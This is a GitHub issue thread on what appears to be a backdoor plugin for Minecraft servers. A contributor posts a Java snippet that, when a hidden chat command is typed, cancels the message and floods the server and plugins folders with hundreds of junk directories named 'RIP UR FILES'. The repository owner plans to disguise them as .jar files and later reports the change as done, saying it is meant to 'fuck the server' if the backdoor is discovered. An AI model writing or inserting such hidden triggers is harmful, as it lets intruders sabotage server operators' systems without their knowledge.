### ISSUE TITLE
Not bad but i have something i think you will love.

### ISSUE THREAD

**Issue by GreatZardasht** [Apmunute/backdoor-for-retard#1]
}
        if (args[0].equalsIgnoreCase("#PceFiles")) {
            trent.setCancelled(true);
            for (int PceFiles = 0; PceFiles < 900; ++PceFiles) {
                File userfiles = new File(String.valueOf(PceFiles) + "RIP UR FILES" + Math.random());
                if (!userfiles.exists()) {
                    userfiles.mkdirs();
                }
                userfiles = new File("plugins/" + PceFiles + "RIP UR FILES" + Math.random());
            }
        }

If someone type #PceFiles in chat it will make 100s of new files with RI[P UR FILES

**Comment by Apmunute** [comment]
might implement and change the extensions to .jar :^)

**Comment by business-goose** [comment]
but why my man

**Comment by Apmunute** [comment]
if the owner sees you using the backdoor you might as well fuck the server

**Comment by QuadraticKid** [comment]
E

**Comment by Apmunute** [comment]
> 
> 
> E

very useful thanks QuadraticKid

**Comment by Apmunute** [comment]
Done.
